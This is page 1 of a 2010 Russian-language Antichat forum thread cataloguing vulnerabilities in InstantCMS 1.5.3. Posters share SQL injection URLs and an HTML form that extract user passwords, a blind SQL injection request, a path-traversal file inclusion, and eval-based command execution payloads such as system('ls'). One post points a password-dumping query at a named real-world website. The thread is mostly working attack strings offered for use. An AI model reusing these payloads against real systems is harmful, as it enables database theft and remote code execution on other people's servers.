ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Обзор уязвимостей InstantCMS
   
Ответ
Страница 1 из 4 1 2 3 4 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.03.2010, 01:43
Аватар для Jerri
Jerri
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517

Репутация: 334
Отправить сообщение для Jerri с помощью ICQ
По умолчанию
InstantCMS
version : 1.5.3
http://www.instantcms.ru/

SQL-INJ :

Код:
/admin/index.php?view=components&do=config&id=6&opt=edit&item_id=-1+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6+--+
(требуется доступ к админке.)
Последний раз редактировалось Jerri; 08.03.2010 в 01:47..
 
Ответить с цитированием

  #2  
Старый 12.03.2010, 18:29
Аватар для Jerri
Jerri
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517

Репутация: 334
Отправить сообщение для Jerri с помощью ICQ
По умолчанию
InstantCMS
v 1.5.3

SQL Injection

Уязвимость в /components/photos/frontend.php

PHP код:
if ($do=='view')

...
if (isset($_POST['orderby'])) 

     $orderby $_POST['orderby']; 
     $_SESSION['ph_orderby'] = $orderby;

elseif(isset($_SESSION['ph_orderby'])) 

     $orderby $_SESSION['ph_orderby'];

else 
{
     $orderby $album['orderby']; 
}
            
if (isset($_POST['orderto'])) 

     $orderto $_POST['orderto']; 
     $_SESSION['ph_orderto'] = $orderto;

elseif(isset($_SESSION['ph_orderto'])) 

     $orderto $_SESSION['ph_orderto'];

else 
{
    $orderto $album['orderto']; 
}
...
$sql .=  " ORDER BY ".$orderby." ".$orderto." \n";
...
$result $inDB->query($sql) or die(mysql_error().'<br/><br/>'.$sql);

Использование:
передача своего запроса методом POST в http://localhost/?view=photos&do=view.
(перед этим надо зарегистрироваться и авторизоваться)
P.S. иньекция после order by
Последний раз редактировалось Jerri; 12.03.2010 в 19:07..
 
Ответить с цитированием

  #3  
Старый 20.03.2010, 20:11
Аватар для Jerri
Jerri
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517

Репутация: 334
Отправить сообщение для Jerri с помощью ICQ
По умолчанию
InstantCMS
1.5.3


SQL INJ

localhost/components/forum/fronted.php
PHP код:
if ($do=='newthread' || $do=='newpost' || $do=='editpost'){
if (usrCheckAuth()){ #Вы должны быть авторизованы
...
if (isset($_GET['replyid'])) { $replyid $_GET['replyid']; }
else { $replyid 0; }

if(!isset($_POST['gosend'])){

$inDB->query("DELETE FROM cms_upload_images WHERE session_id='".session_id()."'");

if ($replyid){
$sql "SELECT p.*, u.*, DATE_FORMAT(p.pubdate, '%d-%m-%Y в %H:%i') senddate FROM cms_forum_posts p, cms_users u WHERE p.id = $replyid AND p.user_id = u.id";
$result $inDB->query($sql) ;
}
}

Код:
http://localhost/?view=forum&do=newthread&replyid=-29+and+1=1+union+select+1,2,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM cms_users+--+
В жизни:
Код:
http://kokshetau.kz/?view=forum&do=newthread&replyid=-29+and+1=1+union+select+1,2,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20FROM%20cms_users+--+
//Требуется регистрация

SQL INJ

Требования : доступ к админке.

Код:
http://localhost/admin/index.php?view=components&do=config&id=7&opt=edit&item_id=-16+and+1=1+union+select+1,2,3,4,5,6,7,password,9,10,11+from+cms_users+--+
Последний раз редактировалось Jerri; 21.03.2010 в 15:47..
 
Ответить с цитированием

  #4  
Старый 23.03.2010, 01:20
Аватар для Jerri
Jerri
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517

Репутация: 334
Отправить сообщение для Jerri с помощью ICQ
По умолчанию
InstantCMS
1.5.3

SQL INJ

components/users/frontend.php
PHP код:
if ($do=='sendmessage'){
if (usrCheckAuth() && $inUser->id!=$id){
...
if ($usr || isset($_POST['massmail'])){
if (usrCheckAuth()){
...
if (isset($_GET['replyid'])) { $replyid $_GET['replyid']; }
  else { $replyid 0; }
...
if ($replyid){
$sql "SELECT m.*, u.* FROM cms_user_msg m, cms_users u WHERE m.id = $replyid AND m.from_id = u.id AND m.to_id = $from_id";
$result $inDB->query($sql) ; 
Требования :
Вы должны быть авторизованы

Использование:
Код:
<form action="http://localhost/?view=users&do=sendmessage&replyid=-100+and+1=1+union+select+1,2,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+cms_users+--+" method="post">
<input name="massmail" value="1">
<input type="submit" value="Send">
</form>
Последний раз редактировалось Jerri; 23.03.2010 в 01:26..
 
Ответить с цитированием

  #5  
Старый 23.03.2010, 19:32
Аватар для Jerri
Jerri
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517

Репутация: 334
Отправить сообщение для Jerri с помощью ICQ
По умолчанию
InstantCMS
1.5.3

SQL INJ

В админке:

1.
Код:
http://test1.ru/admin/index.php?view=components&do=config&link=banners&opt=edit&item_id=-100+and+1=1+union+select+1,2,3,4,5,6,7,8,9,10,password,12,13+from+cms_users+--+
2.
Код:
http://test1.ru/admin/index.php?view=components&do=config&link=board&opt=edit_cat&item_id=-100+union+select+1,2,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+cms_users--+
Ну и таких однотипных уязвимостей в админке множество.

P.S.
Раскрытие пути

Код:
http://localhost/admin/modules/mod_arhive/backend.php
 
Ответить с цитированием

Blind SQL-Injection
  #6  
Старый 27.03.2010, 01:48
Аватар для Sc0rpi0n
Sc0rpi0n
Новичок
Регистрация: 23.02.2010
Сообщений: 3
Провел на форуме:
46117

Репутация: 76
Отправить сообщение для Sc0rpi0n с помощью ICQ
По умолчанию Blind SQL-Injection
Blind SQL-Injection
/componets/catalog/fronted.php

PHP код:
if (isset($_POST['orderby'])) {
                $orderby $_POST['orderby'];
            ...
            }

            if (isset($_POST['orderto'])) {
                $orderto $_POST['orderto'];
             ...
            }

            $sql .=  " ORDER BY ".$orderby." ".$orderto;

            $result $inDB->query($sql); 
Код:
POST http://instantcms/catalog/23/1 HTTP/1.0
Host: instantcms
Content-Type: application/x-www-form-urlencoded
Content-length: 65

orderby=(i.id* IF (ASCII(SUBSTRING(version(),1,1))=53,1,-1)) --
Последний раз редактировалось Sc0rpi0n; 05.06.2010 в 01:45..
 
Ответить с цитированием

  #7  
Старый 05.04.2010, 03:26
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию
1.5.3
LFI + Eval Code Execution!
/admin/includes/cp.php
PHP код:
...function cpProceedBody(){
    
    ob_start();
    
    $link str_replace('/'''$GLOBALS['applet']);
    $link str_replace(':'''$link);
    $link str_replace('-'''$link);
    $file $link '.php';
    include('applets/'.$file);
    eval('applet_'.$link.'();');
    
    $GLOBALS['cp_page_body'] = ob_get_clean();
    
}... 
Result:
http://instant/admin/index.php?view=cats[lfi]

Example:
http://instant/admin/index.php?view=cats\..\..\..\..\.htaccess[. т.д]
http://instant/admin/index.php?view=cats\..\..\..\..\.htaccess%00

Модуль может быть другой!

Условие:
- админка;
- только \.
Последний раз редактировалось Strilo4ka; 05.04.2010 в 16:21..
 
Ответить с цитированием

  #8  
Старый 05.04.2010, 12:08
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Цитата:
Сообщение от Strilo4ka  
1.5.3
LFI
/admin/includes/cp.php
PHP код:
...function cpProceedBody(){
    
    ob_start();
    
    $link str_replace('/'''$GLOBALS['applet']);
    $link str_replace(':'''$link);
    $link str_replace('-'''$link);
    $file $link '.php';
    include('applets/'.$file);
    eval('applet_'.$link.'();');
    
    $GLOBALS['cp_page_body'] = ob_get_clean();
    
}... 
Result:
http://instant/admin/index.php?view=cats[lfi]

Example:
http://instant/admin/index.php?view=cats\..\..\..\..\.htaccess[. т.д]
http://instant/admin/index.php?view=cats\..\..\..\..\.htaccess%00

Модуль может быть другой!

Условие:
- админка;
- только \.
А чем вам не нравится eval ? Я код не качал, но исходя из того, что вижу, он должен работать:

?applet=;system('ls');rand

Или там что-то мешает?

PS
И кстати, да у меня тут хакеры спрашивают WTF???
$link= str_replace('/', '', $GLOBALS['applet']);
а потом
view=cats\..\..\..\..\.htaccess

Выкладывай весь необходимый код, ибо нихрена не понятно
Последний раз редактировалось Jokester; 05.04.2010 в 12:22..
 
Ответить с цитированием

  #9  
Старый 05.04.2010, 12:40
Аватар для Sc0rpi0n
Sc0rpi0n
Новичок
Регистрация: 23.02.2010
Сообщений: 3
Провел на форуме:
46117

Репутация: 76
Отправить сообщение для Sc0rpi0n с помощью ICQ
По умолчанию
Цитата:
Сообщение от Jokester  

?applet=;system('ls');rand
Или там что-то мешает?

/admin/index.php

PHP код:

if (isset($_REQUEST['view'])){
        $GLOBALS['applet'] = $_REQUEST['view'];
    } else {
        $GLOBALS['applet'] = 'main'
http://test/admin/index.php?view=;phpinfo();rand
Последний раз редактировалось Sc0rpi0n; 05.06.2010 в 01:47..
 
Ответить с цитированием

  #10  
Старый 05.04.2010, 13:03
Аватар для S00pY
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию
Просто Джокестр,не смотрел код, там в индексе
PHP код:
if(isset($_REQUEST['view']))
{          
$GLOBALS['applet'] = $_REQUEST['view'];      
} else 
{          
$GLOBALS['applet'] = 'main';      

Эм сорри, опередил Скорп
 
Ответить с цитированием
Ответ
Страница 1 из 4 1 2 3 4 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ